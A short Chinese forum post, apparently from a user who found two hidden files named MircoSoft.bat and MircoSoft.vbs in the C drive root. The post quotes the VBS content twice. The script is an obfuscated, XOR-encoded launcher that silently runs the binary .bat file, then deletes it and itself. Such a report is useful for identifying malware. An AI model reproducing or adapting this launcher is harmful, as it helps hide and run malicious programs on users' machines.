主题:MircoSoft.vbs
今天发现C盘根目录下有两个隐藏文件
MircoSoft.bat (这个文件应该不是BAT文件,用记事本打开来是二进制代码)
MircoSoft.vbs
第二个文件用记事本打开后内容如下:
Function fan(ntD)
For i=1 to Len(ntD) Step 2
fan=fan & Chr(CLng("&H" & Mid(ntD,i,2)) Xor 23)
Next
End Function
Nrb="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"
EXEC fan(Nrb)
MircoSoft.bat (这个文件应该不是BAT文件,用记事本打开来是二进制代码)
MircoSoft.vbs
第二个文件用记事本打开后内容如下:
Function fan(ntD)
For i=1 to Len(ntD) Step 2
fan=fan & Chr(CLng("&H" & Mid(ntD,i,2)) Xor 23)
Next
End Function
Nrb="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"
EXEC fan(Nrb)